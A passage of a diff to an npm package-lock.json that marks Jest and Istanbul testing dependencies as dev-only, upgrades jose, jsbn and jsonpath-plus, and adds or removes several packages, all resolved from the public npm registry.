"sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", + "dev": true, "requires": { "hasown": "^2.0.2" } @@ -5621,33 +6007,32 @@ "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "dev": true }, "is-generator-fn": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==" + "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", + "dev": true }, "is-number": { "version": "7.0.0", "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==" + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true }, "is-stream": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==" - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==", + "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", "dev": true }, "isexe": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "dev": true }, "isomorphic-ws": { "version": "5.0.0", @@ -5656,21 +6041,17 @@ "dev": true, "requires": {} }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==", - "dev": true - }, "istanbul-lib-coverage": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==" + "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", + "dev": true }, "istanbul-lib-instrument": { "version": "5.2.1", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", + "dev": true, "requires": { "@babel/core": "^7.12.3", "@babel/parser": "^7.14.7", @@ -5683,6 +6064,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", + "dev": true, "requires": { "istanbul-lib-coverage": "^3.0.0", "make-dir": "^4.0.0", @@ -5693,6 +6075,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", + "dev": true, "requires": { "debug": "^4.1.1", "istanbul-lib-coverage": "^3.0.0", @@ -5703,6 +6086,7 @@ "version": "3.1.7", "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", + "dev": true, "requires": { "html-escaper": "^2.0.0", "istanbul-lib-report": "^3.0.0" @@ -5712,6 +6096,7 @@ "version": "10.9.2", "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", + "dev": true, "requires": { "async": "^3.2.3", "chalk": "^4.0.2", @@ -5723,6 +6108,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", + "dev": true, "requires": { "@jest/core": "^29.7.0", "@jest/types": "^29.6.3", @@ -5734,6 +6120,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", + "dev": true, "requires": { "execa": "^5.0.0", "jest-util": "^29.7.0", @@ -5744,6 +6131,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -5771,6 +6159,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", + "dev": true, "requires": { "@jest/core": "^29.7.0", "@jest/test-result": "^29.7.0", @@ -5789,6 +6178,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", + "dev": true, "requires": { "@babel/core": "^7.11.6", "@jest/test-sequencer": "^29.7.0", @@ -5818,6 +6208,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", + "dev": true, "requires": { "chalk": "^4.0.0", "diff-sequences": "^29.6.3", @@ -5829,6 +6220,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", + "dev": true, "requires": { "detect-newline": "^3.0.0" } @@ -5837,6 +6229,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "chalk": "^4.0.0", @@ -5849,6 +6242,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -5861,12 +6255,14 @@ "jest-get-type": { "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==" + "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", + "dev": true }, "jest-haste-map": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/graceful-fs": "^4.1.3", @@ -5886,6 +6282,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", + "dev": true, "requires": { "jest-get-type": "^29.6.3", "pretty-format": "^29.7.0" @@ -5895,6 +6292,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", + "dev": true, "requires": { "chalk": "^4.0.0", "jest-diff": "^29.7.0", @@ -5906,6 +6304,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", + "dev": true, "requires": { "@babel/code-frame": "^7.12.13", "@jest/types": "^29.6.3", @@ -5922,6 +6321,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -5932,17 +6332,20 @@ "version": "1.2.3", "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", + "dev": true, "requires": {} }, "jest-regex-util": { "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==" + "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", + "dev": true }, "jest-resolve": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", + "dev": true, "requires": { "chalk": "^4.0.0", "graceful-fs": "^4.2.9", @@ -5959,6 +6362,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", + "dev": true, "requires": { "jest-regex-util": "^29.6.3", "jest-snapshot": "^29.7.0" @@ -5968,6 +6372,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", + "dev": true, "requires": { "@jest/console": "^29.7.0", "@jest/environment": "^29.7.0", @@ -5996,6 +6401,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -6025,6 +6431,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", + "dev": true, "requires": { "@babel/core": "^7.11.6", "@babel/generator": "^7.7.2", @@ -6051,7 +6458,8 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, @@ -6059,6 +6467,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -6072,6 +6481,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "camelcase": "^6.2.0", @@ -6084,7 +6494,8 @@ "camelcase": { "version": "6.3.0", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==" + "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + "dev": true } } }, @@ -6092,6 +6503,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", + "dev": true, "requires": { "@jest/test-result": "^29.7.0", "@jest/types": "^29.6.3", @@ -6107,6 +6519,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", + "dev": true, "requires": { "@types/node": "*", "jest-util": "^29.7.0", @@ -6118,6 +6531,7 @@ "version": "8.1.1", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dev": true, "requires": { "has-flag": "^4.0.0" } @@ -6125,16 +6539,16 @@ } }, "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "dev": true, - "optional": true + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", + "dev": true }, "js-tokens": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dev": true }, "js-yaml": { "version": "4.1.0", @@ -6146,81 +6560,69 @@ } }, "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==", + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true + }, + "jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", "dev": true }, "jsesc": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==" + "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", + "dev": true }, "json-parse-even-better-errors": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==" - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==", + "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", "dev": true }, "json5": { "version": "2.2.3", "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==" - }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", + "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", "dev": true }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", + "jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "dev": true, "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" } }, "kleur": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==" + "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", + "dev": true }, "leven": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==" + "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", + "dev": true }, "lines-and-columns": { "version": "1.2.4", "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==" + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "dev": true }, "locate-path": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, "requires": { "p-locate": "^4.1.0" } @@ -6228,12 +6630,14 @@ "lodash.memoize": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==" + "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", + "dev": true }, "lru-cache": { "version": "5.1.1", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "dev": true, "requires": { "yallist": "^3.0.2" } @@ -6242,6 +6646,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", + "dev": true, "requires": { "semver": "^7.5.3" }, @@ -6249,32 +6654,43 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, "make-error": { "version": "1.3.6", "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==" + "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", + "dev": true }, "makeerror": { "version": "1.0.12", "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", + "dev": true, "requires": { "tmpl": "1.0.5" } }, + "math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true + }, "merge-stream": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==" + "integrity": 